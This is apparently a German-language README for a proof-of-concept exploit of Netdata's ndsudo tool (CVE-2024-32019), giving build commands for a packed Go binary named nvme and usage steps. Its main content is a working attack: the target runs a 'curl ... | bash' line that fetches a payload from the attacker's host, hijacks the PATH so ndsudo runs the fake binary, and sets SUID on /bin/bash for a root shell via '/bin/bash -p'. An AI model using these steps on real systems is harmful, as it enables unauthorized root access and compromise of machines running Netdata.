
Netdata ndsudo PoC
Netdata ndsudo PoC
Erstelle die Binärdatei:
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
Führe das Bash-Skript aus:
bash exploit.sh <YOUR IP>
Führe auf der Zielmaschine in einem beschreibbaren Verzeichnis aus:
curl http://<YOUT IP>:8000/payload.sh | bash
Es wird automatisch die nvme-Binärdatei herunterladen, den Pfad exportieren, ndsudo ausführen und SUID zu /bin/bash hinzufügen.
Wahrscheinlich musst du den ndsudo-Pfad in exploit.sh ändern.
Um Privilegien zu eskalieren, führe einfach aus:
/bin/bash -p
Der Exploit basiert auf https://github.com/AzureADTrent/CVE-2024-32019-POC. Als ich ihn getestet habe, bekam ich den Fehler:
execve: Exec format error
Deshalb habe ich beschlossen, meinen eigenen mit Go zu erstellen.